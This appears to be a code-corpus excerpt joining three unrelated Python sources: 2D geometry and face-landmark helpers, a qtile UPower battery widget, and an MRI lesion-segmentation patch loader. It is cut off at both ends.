:return coordinates of the wanted endpoint
:rtype list - [] or tuple - ()
:raises ValueError: if the passed mode ('mode') is not supported by this function.
(If the mode is not one of the keys of the TYPES_OF_ENDPOINTS dictionary.)
"""
supported_modes = list(TYPES_OF_ENDPOINTS.keys())
if mode not in supported_modes:
supported_modes = ", ".join(map(lambda mode: "'" + mode + "'", supported_modes))
raise ValueError("The passed mode: '{mode}' is not supported by this function. "
"The supported modes are: {supported_modes}.".format(mode=mode,
supported_modes=supported_modes))
endpoint_settings = TYPES_OF_ENDPOINTS[mode]
index_of_a_coordinate = endpoint_settings["INDEX_OF_A_COORDINATE"]
comparison_operator = endpoint_settings["COMPARSION_OPERATOR"]
wanted_point = coordinates[0]
for idx in range(1, len(coordinates)):
if comparison_operator(coordinates[idx][index_of_a_coordinate], wanted_point[index_of_a_coordinate]):
wanted_point = coordinates[idx]
return wanted_point
def get_point_relative_to_another_point(endpoint, midpoint):
"""
:param endpoint: coordinates of the start point of a line in 2D Space ([x, y] or (x, y))
:type endpoint: list - [] or tuple - ()
:param midpoint: coordinates of the midpoint of a line in 2D Space ([x, y] or (x, y))
:type midpoint: list - [] or tuple - ()
:return coordinates of the end point of a line in 2D Space ([x, y] or (x, y))
:rtype tuple - ()
"""
return (2 * midpoint[0] - endpoint[0],
2 * midpoint[1] - endpoint[1])
def point_along_a_line_distanced_from_another_point(A, B, offset_from_A):
"""
:param A: coordinates of a point of the straight in 2D Space ([x, y] or (x, y))
:type A: list - [] or tuple - ()
:param B: coordinates of an another point of the straight in 2D Space ([x, y] or (x, y))
:type B: list - [] or tuple - ()
:param offset_from_A: percent of the Euclidean distance between A and B where 0 % is equal to 0 and 100% is equal to 1.
:type offset_from_A: float
:return coordinates of the point on same straight.
The point is located next to point A and is away from it by the length equal to : (Euclidean distance between A and B) * offset_from_A
C--A------B
:rtype tuple - ()
"""
point_inside_a_line = point_dividing_a_line_segment(A=A,
B=B,
offset_from_A=offset_from_A)
point_outside_a_line = get_point_relative_to_another_point(endpoint=point_inside_a_line,
midpoint=A)
return point_outside_a_line
def get_faces_landmarks(rgb_array):
"""
:param rgb_array: an RGB image converted into a numpy array (the array has following shape(y, x, 3))
:type rgb_array: numpy.ndarray (https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.html)
:return: a list of dictionaries of face feature locations (eyes, nose, etc)
:rtype list - []
"""
face_landmarks_list = face_landmarks(rgb_array)
return face_landmarks_list
|
StarcoderdataPython
|
3324375
|
<filename>qtile_extras/widget/upower.py<gh_stars>10-100
# Copyright (c) 2021 elParaguayo
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
from dbus_next.aio import MessageBus
from dbus_next.constants import BusType
from libqtile import bar
from libqtile.log_utils import logger
from libqtile.widget import base
PROPS_IFACE = "org.freedesktop.DBus.Properties"
UPOWER_SERVICE = "org.freedesktop.UPower"
UPOWER_INTERFACE = "org.freedesktop.UPower"
UPOWER_PATH = "/org/freedesktop/UPower"
UPOWER_DEVICE = UPOWER_INTERFACE + ".Device"
UPOWER_BUS = BusType.SYSTEM
class UPowerWidget(base._Widget):
"""
A graphical widget to display laptop battery level.
The widget uses dbus to read the battery information from the UPower
interface.
The widget will display one icon for each battery found or users can
specify the name of the battery if they only wish to display one.
Clicking on the widget will display the battery level and the time to
empty/full.
All colours can be customised as well as low/critical percentage levels.
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("font", "sans", "Default font"),
("fontsize", None, "Font size"),
("font_colour", "ffffff", "Font colour for information text"),
("battery_height", 10, "Height of battery icon"),
("battery_width", 20, "Size of battery icon"),
("battery_name", None, "Battery name. None = all batteries"),
("border_charge_colour", "8888ff", "Border colour when charging."),
("border_colour", "dbdbe0", "Border colour when discharging."),
("border_critical_colour", "cc0000", "Border colour when battery low."),
("fill_normal", "dbdbe0", "Fill when normal"),
("fill_low", "aa00aa", "Fill colour when battery low"),
("fill_critical", "cc0000", "Fill when critically low"),
("margin", 2, "Margin on sides of widget"),
("spacing", 5, "Space between batteries"),
("percentage_low", 0.20, "Low level threshold."),
("percentage_critical", 0.10, "Critical level threshold."),
(
"text_charging",
"({percentage:.0f}%) {ttf} until fully charged",
"Text to display when charging.",
),
(
"text_discharging",
"({percentage:.0f}%) {tte} until empty",
"Text to display when on battery.",
),
("text_displaytime", 5, "Time for text to remain before hiding"),
]
_screenshots = [
("battery_normal.png", "Normal"),
("battery_low.png", "Low"),
("battery_critical.png", "Critical"),
("battery_charging.png", "Charging"),
("battery_multiple.png", "Multiple batteries"),
("battery_textdisplay.gif", "Showing text"),
]
_dependencies = ["dbus-next"]
def __init__(self, **config):
base._Widget.__init__(self, bar.CALCULATED, **config)
self.add_defaults(UPowerWidget.defaults)
self.batteries = []
self.charging = False
# Initial variables to hide text
self.show_text = False
self.hide_timer = None
self.configured = False
self.add_callbacks({"Button1": self.toggle_text})
def _configure(self, qtile, bar):
base._Widget._configure(self, qtile, bar)
# Define colours
self.colours = [
(self.percentage_critical, self.fill_critical),
(self.percentage_low, self.fill_low),
(100, self.fill_normal),
]
self.status = [
(self.percentage_critical, "Critical"),
(self.percentage_low, "Low"),
(100, "Normal"),
]
self.borders = {True: self.border_charge_colour, False: self.border_colour}
async def _config_async(self):
await self._setup_dbus()
async def _setup_dbus(self):
# Set up connection to DBus
self.bus = await MessageBus(bus_type=UPOWER_BUS).connect()
introspection = await self.bus.introspect(UPOWER_SERVICE, UPOWER_PATH)
object = self.bus.get_proxy_object(UPOWER_SERVICE, UPOWER_PATH, introspection)
props = object.get_interface("org.freedesktop.DBus.Properties")
props.on_properties_changed(self.upower_change)
self.upower = object.get_interface(UPOWER_INTERFACE)
# Get battery details from DBus
self.batteries = await self.find_batteries()
# Is laptop charging?
self.charging = not await self.upower.get_on_battery()
self.configured = await self._update_battery_info()
def max_text_length(self):
# Generate text string based on status
if self.charging:
text = self.text_charging.format(percentage=100, ttf="99:99")
else:
text = self.text_discharging.format(percentage=100, tte="99:99")
# Calculate width of text
width, _ = self.drawer.max_layout_size([text], self.font, self.fontsize)
return width
def calculate_length(self):
# Start with zero width and we'll add to it
bar_length = 0
if not self.configured:
return 0
# We can use maths to simplify if more than one battery
num_batteries = len(self.batteries)
if num_batteries:
# Icon widths
length = (
(self.margin * 2)
+ (self.spacing * (num_batteries - 1))
+ (self.battery_width * num_batteries)
)
bar_length += length
# Add text width if it's being displayed
if self.show_text:
bar_length += (self.max_text_length() + self.spacing) * num_batteries
return bar_length
async def find_batteries(self):
# Get all UPower devices that are named "battery"
batteries = await self.upower.call_enumerate_devices()
batteries = [b for b in batteries if "battery" in b]
if not batteries:
logger.warning("No batteries found. No icons will be displayed.")
return []
# Get DBus object for each battery
battery_devices = []
for battery in batteries:
bat = {}
introspection = await self.bus.introspect(UPOWER_SERVICE, battery)
battery_obj = self.bus.get_proxy_object(UPOWER_SERVICE, battery, introspection)
battery_dev = battery_obj.get_interface(UPOWER_DEVICE)
props = battery_obj.get_interface(PROPS_IFACE)
bat["device"] = battery_dev
bat["props"] = props
bat["name"] = await battery_dev.get_native_path()
battery_devices.append(bat)
# If user only wants named battery, get it here
if self.battery_name:
battery_devices = [b for b in battery_devices if b["name"] == self.battery_name]
if not battery_devices:
err = "No battery found matching {}.".format(self.battery_name)
logger.warning(err)
return []
# Listen for change signals on DBus
for battery in battery_devices:
battery["props"].on_properties_changed(self.battery_change)
await self._update_battery_info(False)
return battery_devices
def upower_change(self, interface, changed, invalidated):
# Update the charging status
asyncio.create_task(self._upower_change())
async def _upower_change(self):
self.charging = not await self.upower.get_on_battery()
asyncio.create_task(self._update_battery_info())
def battery_change(self, interface, changed, invalidated):
# The batteries are polled every 2 mins by DBus so let's just update
# when we get any signal
asyncio.create_task(self._update_battery_info())
async def _update_battery_info(self, draw=True):
for battery in self.batteries:
dev = battery["device"]
percentage = await dev.get_percentage()
battery["fraction"] = percentage / 100.0
battery["percentage"] = percentage
if self.charging:
ttf = await dev.get_time_to_full()
battery["ttf"] = self.secs_to_hm(ttf)
battery["tte"] = ""
else:
tte = await dev.get_time_to_empty()
battery["tte"] = self.secs_to_hm(tte)
battery["ttf"] = ""
battery["status"] = next(x[1] for x in self.status if battery["fraction"] <= x[0])
if draw:
self.qtile.call_soon(self.bar.draw)
return True
def draw(self):
if not self.configured:
return
# Remove background
self.drawer.clear(self.background or self.bar.background)
# Define an offset for widgets
offset = self.margin
# Work out top of battery
top_margin = (self.bar.height - self.battery_height) / 2
# Loop over each battery
for battery in self.batteries:
# Get battery energy level
percentage = battery["fraction"]
# Get the appropriate fill colour
# This finds the first value in self_colours which is greater than
# the current battery level and returns the colour string
fill = next(x[1] for x in self.colours if percentage <= x[0])
# Choose border colour
if (percentage <= self.percentage_critical) and not self.charging:
border = self.border_critical_colour
else:
border = self.borders[self.charging]
# Draw the border
self.drawer._rounded_rect(
offset, top_margin, self.battery_width, self.battery_height, 1
)
self.drawer.set_source_rgb(border)
self.drawer.ctx.stroke()
# Work out size of bar inside icon
fill_width = 2 + (self.battery_width - 6) * percentage
# Draw the filling of the battery
self.drawer._rounded_rect(
offset + 2, top_margin + 2, fill_width, (self.battery_height - 4), 0
)
self.drawer.set_source_rgb(fill)
self.drawer.ctx.fill()
# Increase offset for next battery
offset = offset + self.spacing + self.battery_width
if self.show_text:
# Generate text based on status and format time-to-full or
# time-to-empty
if self.charging:
text = self.text_charging.format(**battery)
else:
text = self.text_discharging.format(**battery)
# Create a text box
layout = self.drawer.textlayout(
text, self.font_colour, self.font, self.fontsize, None, wrap=False
)
# We want to centre this vertically
y_offset = (self.bar.height - layout.height) / 2
# Set the layout as wide as the widget so text is centred
layout.width = self.max_text_length()
# Draw it
layout.draw(offset, y_offset)
# Increase the offset
offset += layout.width
# Redraw the bar
self.drawer.draw(offsetx=self.offset, offsety=self.offsety, width=self.length)
def secs_to_hm(self, secs):
# Basic maths to convert seconds to h:mm format
m, _ = divmod(secs, 60)
h, m = divmod(m, 60)
# Need to mke sure minutes are zero padded in case single digit
return "{}:{:02d}".format(h, m)
def toggle_text(self):
if not self.show_text:
self.show_text = True
# Start a timer to hide the text
self.hide_timer = self.timeout_add(self.text_displaytime, self.hide)
else:
self.show_text = False
# Cancel the timer as no need for it if text is hidden already
if self.hide_timer:
self.hide_timer.cancel()
self.bar.draw()
def hide(self):
# Self-explanatory!
self.show_text = False
self.bar.draw()
def info(self):
info = base._Widget.info(self)
info["batteries"] = [
{k: v for k, v in x.items() if k not in ["device", "props"]} for x in self.batteries
]
info["charging"] = self.charging
info["levels"] = self.status
return info
|
StarcoderdataPython
|
3316844
|
<filename>UDA/pytorch0.3/DAN/utils/data_load.py
import os
import numpy as np
from nibabel import load as load_nii
import nibabel as nib
from operator import itemgetter
#from libs.CNN.build_model import define_training_layers, fit_model
from operator import add
import torch
from torch.autograd import Variable
import h5py
import glob
from pathlib import Path
import pandas as pd
from collections import defaultdict
def load_target_voxels(train_x_data, options):
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
modalities = train_x_data[scans[0]].keys()
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
# load images and normalize their intensities
images = [load_nii(image_name).get_data() for image_name in flair_scans]
images_norm = [normalize_data(im) for im in images]
# select voxels with intensity higher than threshold
selected_voxels = [image > options['min_th'] for image in images_norm]
data = []
random_state=42
datatype=np.float32
patch_size = options['patch_size']
for m in modalities:
x_data = [train_x_data[s][m] for s in scans]
images = [load_nii(name).get_data() for name in x_data]
images_norm = [normalize_data(im) for im in images]
# Get all the x,y,z coordinates for each image
centers = [get_mask_voxels(mask) for mask in selected_voxels]
x_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, centers)]
data.append(np.concatenate(x_patches))
X = np.stack(data, axis=1)
return X
def generate_data_patches(x_dict, y_dict, options, dataset_name='ISBI', model=None):
#if os.path.isdir(h5_path) and glob.glob(h5_path+'*.hdf5') and y_dict is not None:
# print('Data patches already exist try to change location option')
#else:
# generate patches
#x_dict, y_dict = get_data_path(options['train_csv_path'], options['modalities'], options['masks'])
h5_path= options['h5_path']
train_csv_path = options['train_csv_path']
f5_path_column_name = 'f5_path' + options['train_count']
train_data = pd.read_csv(train_csv_path)
for idx in x_dict:
train_x_data = {idx: x_dict[idx]}
if y_dict is not None:
train_y_data = {idx: y_dict[idx]}
X, Y, _ = load_training_data(train_x_data, train_y_data, options, model=model)
print(X.shape, Y.shape)
else:
X = load_target_voxels(train_x_data, options)
Y = None
train_y_data = None
print(X.shape)
Path(h5_path).mkdir(parents=True, exist_ok=True)
f5_path = os.path.join(h5_path, 'file_'+idx+'.hdf5')
if dataset_name == 'ISBI':
index = train_data.loc[train_data.patient_id+train_data.study == idx].index[0]
else:
index = train_data.loc[train_data.center_id+'_'+train_data.patient == idx].index[0]
train_data.loc[index, f5_path_column_name] = f5_path
#for i in raw_data:
with h5py.File(f5_path, 'w') as f:
print(X.shape, 'patches', X.shape[0], 'modalities', X.shape[-1])
f.create_dataset("id", data=idx)
f.create_dataset("patches", data=X.shape[0])
f.create_dataset("modalities", data=X.shape[-1])
f.create_dataset(str('X'), data=X)
if Y is not None:
f.create_dataset(str('Y'), data=Y)
train_data.to_csv(train_csv_path, index=False)
def load_data_patches(h5_path, train_csv_path, phase='train', fold=0, options=None):
f5_path_column_name = 'f5_path' + options['train_count']
#phase['train', 'valid', 'all']
# patches generated in hdf5 files load it
if not os.path.isdir(h5_path) and glob.glob(h5_path+'*.hdf5'):
print('Data patches not exist try to generate it first or define correct location')
return
# load patches
# files=glob.glob(options['h5_path']+'*.hdf5')
files = []
df = pd.read_csv(train_csv_path)
if phase == 'train':
files = df.loc[df['fold'] != fold, f5_path_column_name].values
elif phase == 'valid':
files = df.loc[df['fold'] == fold, f5_path_column_name].values
else:
# all files
files = df[f5_path_column_name].values
files_data = {}
files_ref = {}
patches = 0
for file in files:
print(file)
#with h5py.File(raw_path, 'r') as f:
raw_file = h5py.File(file, 'r') # should not close it immediately
# raw_data = raw_file["raw_data"]
raw_data = defaultdict(list)
for i in raw_file.keys():
# to get the matrix: self.data[i][:]
# d.data[i][j][0], d.data[i][j][1]
raw_data[i] = raw_file[i]
patches += raw_data['patches'][()]
patient_id = raw_data['id'][()]
files_data[patient_id] = raw_data
files_ref[patient_id] = raw_file
return files_data, files_ref, patches
def load_training_data(train_x_data,
train_y_data,
options,
model=None,
selected_voxels=None):
'''
Load training and label samples for all given scans and modalities.
Inputs:
train_x_data: a nested dictionary containing training image paths:
train_x_data['scan_name']['modality'] = path_to_image_modality
train_y_data: a dictionary containing labels
train_y_data['scan_name'] = path_to_label
options: dictionary containing general hyper-parameters:
- options['min_th'] = min threshold to remove voxels for training
- options['size'] = tuple containing patch size, either 2D (p1, p2, 1)
or 3D (p1, p2, p3)
- options['randomize_train'] = randomizes data
- options['fully_conv'] = fully_convolutional labels. If false,
model: CNN model used to select training candidates
Outputs:
- X: np.array [num_samples, num_channels, p1, p2, p2]
- Y: np.array [num_samples, 1, p1, p2, p3] if fully conv,
[num_samples, 1] otherwise
'''
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
modalities = train_x_data[scans[0]].keys()
# select voxels for training:
# if model is no passed, training samples are extract by discarding CSF
# and darker WM in FLAIR, and use all remaining voxels.
# if model is passes, use the trained model to extract all voxels
# with probability > 0.5
if model is None:
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
selected_voxels = select_training_voxels(flair_scans,
options['min_th'])
elif selected_voxels is None:
selected_voxels = select_voxels_from_previous_model(model,
train_x_data,
options)
else:
pass
# extract patches and labels for each of the modalities
data = []
for m in modalities:
x_data = [train_x_data[s][m] for s in scans]
y_data = [train_y_data[s] for s in scans]
x_patches, y_patches = load_train_patches(x_data,
y_data,
selected_voxels,
options['patch_size'])
data.append(x_patches)
# stack patches in channels [samples, channels, p1, p2, p3]
X = np.stack(data, axis=1)
Y = y_patches
# apply randomization if selected
if options['randomize_train']:
seed = np.random.randint(np.iinfo(np.int32).max)
np.random.seed(seed)
X = np.random.permutation(X.astype(dtype=np.float32))
np.random.seed(seed)
Y = np.random.permutation(Y.astype(dtype=np.int32))
print('shape', Y.shape)
# fully convolutional / voxel labels
if options['fully_convolutional']:
# Y = [ num_samples, 1, p1, p2, p3]
Y = np.expand_dims(Y, axis=1)
else:
# Y = [num_samples,]
if Y.shape[3] == 1:
Y = Y[:, Y.shape[1] // 2, Y.shape[2] // 2, :]
else:
Y = Y[:, Y.shape[1] // 2, Y.shape[2] // 2, Y.shape[3] // 2]
Y = np.squeeze(Y)
return X, Y, selected_voxels
def normalize_data(im, datatype=np.float32):
"""
zero mean / 1 standard deviation image normalization
"""
im = im.astype(dtype=datatype) - im[np.nonzero(im)].mean()
im = im / im[np.nonzero(im)].std()
return im
def select_training_voxels(input_masks, threshold=2, datatype=np.float32):
"""
Select voxels for training based on a intensity threshold
Inputs:
- input_masks: list containing all subject image paths
for a single modality
- threshold: minimum threshold to apply (after normalizing images
with 0 mean and 1 std)
Output:
- rois: list where each element contains the subject binary mask for
selected voxels [len(x), len(y), len(z)]
"""
# load images and normalize their intensities
images = [load_nii(image_name).get_data() for image_name in input_masks]
images_norm = [normalize_data(im) for im in images]
# select voxels with intensity higher than threshold
rois = [image > threshold for image in images_norm]
return rois
def load_train_patches(x_data,
y_data,
selected_voxels,
patch_size,
random_state=42,
datatype=np.float32):
"""
Load train patches with size equal to patch_size, given a list of
selected voxels
Inputs:
- x_data: list containing all subject image paths for a single modality
- y_data: list containing all subject image paths for the labels
- selected_voxels: list where each element contains the subject binary
mask for selected voxels [len(x), len(y), len(z)]
- tuple containing patch size, either 2D (p1, p2, 1) or 3D (p1, p2, p3)
Outputs:
- X: Train X data matrix for the particular channel
- Y: Train Y labels [num_samples, p1, p2, p3]
"""
# load images and normalize their intensties
images = [load_nii(name).get_data() for name in x_data]
images_norm = [normalize_data(im) for im in images]
# load labels
lesion_masks = [load_nii(name).get_data().astype(dtype=np.bool)
for name in y_data]
nolesion_masks = [np.logical_and(np.logical_not(lesion), brain)
for lesion, brain in zip(lesion_masks, selected_voxels)]
# Get all the x,y,z coordinates for each image
lesion_centers = [get_mask_voxels(mask) for mask in lesion_masks]
nolesion_centers = [get_mask_voxels(mask) for mask in nolesion_masks]
# load all positive samples (lesion voxels) and the same number
# of random negatives samples
np.random.seed(random_state)
x_pos_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, lesion_centers)]
y_pos_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(lesion_masks, lesion_centers)]
indices = [
np.random.permutation(range(0, len(centers1))).tolist()[:len(centers2)]
for centers1, centers2 in zip(nolesion_centers, lesion_centers)]
nolesion_small = [
itemgetter(*idx)(centers)
for centers, idx in zip(nolesion_centers, indices)]
x_neg_patches = [
np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, nolesion_small)]
y_neg_patches = [
np.array(get_patches(image, centers, patch_size))
for image, centers in zip(lesion_masks, nolesion_small)]
# concatenate positive and negative patches for each subject
X = np.concatenate([np.concatenate([x1, x2])
for x1, x2 in zip(x_pos_patches,
x_neg_patches)],
axis=0)
Y = np.concatenate([np.concatenate([y1, y2])
for y1, y2 in zip(y_pos_patches,
y_neg_patches)],
axis=0)
return X, Y
def test_cascaded_model(models, test_x_data, options, cuda):
"""
Test the cascaded approach using a learned model
inputs:
- CNN model: a list containing the two cascaded CNN models
- test_x_data: a nested dictionary containing testing image paths:
test_x_data['scan_name']['modality'] = path_to_image_modality
- options: dictionary containing general hyper-parameters:
outputs:
- output_segmentation
"""
# print '> CNN: testing the model'
# organize experiments
exp_folder = os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'])
if not os.path.exists(exp_folder):
os.mkdir(exp_folder)
# first network
model=models[0]
options['test_name'] = options['experiment'] + '_debug_prob_0.nii.gz'
# only save the first iteration result if debug is True
save_nifti = True if options['debug'] is True else False
t1 = test_scan(model,
test_x_data,
options,
save_nifti=save_nifti, cuda=cuda)
# second network
options['test_name'] = options['experiment'] + '_prob_1.nii.gz'
model= models[1]
t2 = test_scan(model,
test_x_data,
options,
save_nifti=True,
candidate_mask=(t1 > 0.8))
# postprocess the output segmentation
# obtain the orientation from the first scan used for testing
scans = test_x_data.keys()
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
flair_image = load_nii(flair_scans[0])
options['test_name'] = options['experiment'] + '_hard_seg.nii.gz'
out_segmentation = post_process_segmentation(t2,
options,
save_nifti=True,
orientation=flair_image.affine)
# return out_segmentation
return out_segmentation
#return t1
def load_test_patches(test_x_data,
patch_size,
batch_size,
voxel_candidates=None,
datatype=np.float32):
"""
Function generator to load test patches with size equal to patch_size,
given a list of selected voxels. Patches are returned in batches to reduce
the amount of RAM used
Inputs:
- x_data: list containing all subject image paths for a single modality
- selected_voxels: list where each element contains the subject binary
mask for selected voxels [len(x), len(y), len(z)]
- tuple containing patch size, either 2D (p1, p2, 1) or 3D (p1, p2, p3)
- Voxel candidates: a binary mask containing voxels for testing
Outputs (in batches):
- X: Train X data matrix for the each channel [num_samples, p1, p2, p3]
- voxel_coord: list of tuples with voxel coordinates (x,y,z) of
selected patches
"""
# get scan names and number of modalities used
scans = list(test_x_data.keys())
modalities = list(test_x_data[scans[0]].keys())
# load all image modalities and normalize intensities
images = []
for m in modalities:
raw_images = [load_nii(test_x_data[s][m]).get_data() for s in scans]
images.append([normalize_data(im) for im in raw_images])
# select voxels for testing. Discard CSF and darker WM in FLAIR.
# If voxel_candidates is not selected, using intensity > 0.5 in FLAIR,
# else use the binary mask to extract candidate voxels
if voxel_candidates is None:
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
selected_voxels = [get_mask_voxels(mask)
for mask in select_training_voxels(flair_scans,
0.5)][0]
else:
selected_voxels = get_mask_voxels(voxel_candidates)
# yield data for testing with size equal to batch_size
# for i in range(0, len(selected_voxels), batch_size):
# c_centers = selected_voxels[i:i+batch_size]
# X = []
# for m, image_modality in zip(modalities, images):
# X.append(get_patches(image_modality[0], c_centers, patch_size))
# yield np.stack(X, axis=1), c_centers
X = []
for image_modality in images:
X.append(get_patches(image_modality[0], selected_voxels, patch_size))
#print(len(X), len(X[0]))
Xs = np.stack(X, axis=1)
#print(Xs.shape)
return Xs, selected_voxels
def get_mask_voxels(mask):
"""
Compute x,y,z coordinates of a binary mask
Input:
- mask: binary mask
Output:
- list of tuples containing the (x,y,z) coordinate for each of the
input voxels
"""
indices = np.stack(np.nonzero(mask), axis=1)
indices = [tuple(idx) for idx in indices]
return indices
def get_patches(image, centers, patch_size=(15, 15, 15)):
"""
Get image patches of arbitrary size based on a set of centers
"""
# If the size has even numbers, the patch will be centered. If not,
# it will try to create an square almost centered. By doing this we allow
# pooling when using encoders/unets.
patches = []
list_of_tuples = all([isinstance(center, tuple) for center in centers])
sizes_match = [len(center) == len(patch_size) for center in centers]
if list_of_tuples and sizes_match:
patch_half = tuple([idx//2 for idx in patch_size])
new_centers = [map(add, center, patch_half) for center in centers]
padding = tuple((idx, size-idx)
for idx, size in zip(patch_half, patch_size))
new_image = np.pad(image, padding, mode='constant', constant_values=0)
slices = [[slice(c_idx-p_idx, c_idx+(s_idx-p_idx))
for (c_idx, p_idx, s_idx) in zip(center,
patch_half,
patch_size)]
for center in new_centers]
patches = [new_image[idx] for idx in slices]
#patches = np.array(patches)
return patches
def test_scan(model,
test_x_data,
options,
save_nifti=True,
candidate_mask=None, cuda= True):
"""
Test data based on one model
Input:
- test_x_data: a nested dictionary containing training image paths:
train_x_data['scan_name']['modality'] = path_to_image_modality
- save_nifti: save image segmentation
- candidate_mask: a binary masks containing voxels to classify
Output:
- test_scan = Output image containing the probability output segmetnation
- If save_nifti --> Saves a nifti file at specified location
options['test_folder']/['test_scan']
"""
# get_scan name and create an empty nifti image to store segmentation
scans = list(test_x_data.keys())
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
flair_image = load_nii(flair_scans[0])
seg_image = np.zeros_like(flair_image.get_data().astype('float32'))
if candidate_mask is not None:
all_voxels = np.sum(candidate_mask)
else:
all_voxels = np.sum(flair_image.get_data() > 0)
if options['debug'] is True:
print ("> DEBUG ", scans[0], "Voxels to classify:", all_voxels)
# compute lesion segmentation in batches of size options['batch_size']
batch, centers = load_test_patches(test_x_data,
options['patch_size'],
options['batch_size'],
candidate_mask)
if options['debug'] is True:
print ("> DEBUG: testing current_batch:", batch.shape,)
with torch.no_grad():
model.eval()
iter_num = len(batch)//options['batch_size'] if len(batch) % options['batch_size'] ==0 else len(batch)//options['batch_size'] +1
for i in range(iter_num):
start=i*options['batch_size']
end=start+options['batch_size']
data_source_valid = batch[start:end, :]
current_centers = centers[start:end]
# last batch not completed
# last iter from batches less than batch_size
if i ==iter_num-1 and len(batch) % options['batch_size'] != 0:
#data_source_valid = batch[start:, :]
#current_centers = centers[start:]
end = options['batch_size']-len(data_source_valid)
data_source_valid = np.concatenate((data_source_valid, batch[:end, :]), axis=0)
current_centers = np.concatenate((current_centers, centers[:end]), axis=0)
data_source_valid = torch.from_numpy(data_source_valid)
if cuda:
data_source_valid = data_source_valid.cuda()
data_source_valid= Variable(data_source_valid)
s_output, _ = model(data_source_valid)
#F.log_softmax(s_output, dim = 1) # sum up batch loss
y_pred = s_output.data.max(1)[1] # get the index of the max log-probability
y_pred = y_pred.detach().cpu().numpy()
y_pred.reshape(-1, 1)
#y_pred = y_pred.numpy()
[x, y, z] = np.stack(current_centers, axis=1)
seg_image[x, y, z] = y_pred
if options['debug'] is True:
print ("...done!")
# check if the computed volume is lower than the minimum accuracy given
# by the min_error parameter
if check_min_error(seg_image, options, flair_image.header.get_zooms()):
if options['debug']:
print ("> DEBUG ", scans[0], "lesion volume below ", \
options['min_error'], 'ml')
seg_image = np.zeros_like(flair_image.get_data().astype('float32'))
if save_nifti:
out_scan = nib.Nifti1Image(seg_image, affine=flair_image.affine)
out_scan.to_filename(os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'],
options['test_name']))
return seg_image
def check_min_error(input_scan, options, voxel_size):
"""
check that the output volume is higher than the minimum accuracy
given by the
parameter min_error
"""
from scipy import ndimage
t_bin = options['t_bin']
l_min = options['l_min']
# get voxel size in mm^3
voxel_size = np.prod(voxel_size) / 1000.0
# threshold input segmentation
output_scan = np.zeros_like(input_scan)
t_segmentation = input_scan >= t_bin
# filter candidates by size and store those > l_min
labels, num_labels = ndimage.label(t_segmentation)
label_list = np.unique(labels)
num_elements_by_lesion = ndimage.labeled_comprehension(t_segmentation,
labels,
label_list,
np.sum,
float, 0)
for l in range(len(num_elements_by_lesion)):
if num_elements_by_lesion[l] > l_min:
# assign voxels to output
current_voxels = np.stack(np.where(labels == l), axis=1)
output_scan[current_voxels[:, 0],
current_voxels[:, 1],
current_voxels[:, 2]] = 1
return (np.sum(output_scan == 1) * voxel_size) < options['min_error']
def select_voxels_from_previous_model(model, train_x_data, options):
"""
Select training voxels from image segmentation masks
"""
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
# select voxels for training. Discard CSF and darker WM in FLAIR.
# flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
# selected_voxels = select_training_voxels(flair_scans, options['min_th'])
# evaluate training scans using the learned model and extract voxels with
# probability higher than 0.5
seg_masks = []
for scan, s in zip(train_x_data.keys(), range(len(scans))):
#print(train_x_data.items())
#print(dict(list(train_x_data.items())[s:s+1]))
seg_mask = test_scan(model,
dict(list(train_x_data.items())[s:s+1]),
options, save_nifti=False)
seg_masks.append(seg_mask > 0.5)
if options['debug']:
flair = nib.load(train_x_data[scan]['FLAIR'])
tmp_seg = nib.Nifti1Image(seg_mask,
affine=flair.affine)
#tmp_seg.to_filename(os.path.join(options['weight_paths'],
# options['experiment'],
# '.train',
# scan + '_it0.nii.gz'))
# check candidate segmentations:
# if no voxels have been selected, return candidate voxels on
# FLAIR modality > 2
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
images = [load_nii(name).get_data() for name in flair_scans]
images_norm = [normalize_data(im) for im in images]
seg_mask = [im > 2 if np.sum(seg) == 0 else seg
for im, seg in zip(images_norm, seg_masks)]
return seg_mask
def post_process_segmentation(input_scan,
options,
save_nifti=True,
orientation=np.eye(4)):
"""
Post-process the probabilistic segmentation using params t_bin and l_min
t_bin: threshold to binarize the output segmentations
l_min: minimum lesion volume
Inputs:
- input_scan: probabilistic input image (segmentation)
- options dictionary
- save_nifti: save the result as nifti
Output:
- output_scan: final binarized segmentation
"""
from scipy import ndimage
t_bin = options['t_bin']
l_min = options['l_min']
output_scan = np.zeros_like(input_scan)
# threshold input segmentation
t_segmentation = input_scan >= t_bin
# filter candidates by size and store those > l_min
labels, num_labels = ndimage.label(t_segmentation)
label_list = np.unique(labels)
num_elements_by_lesion = ndimage.labeled_comprehension(t_segmentation,
labels,
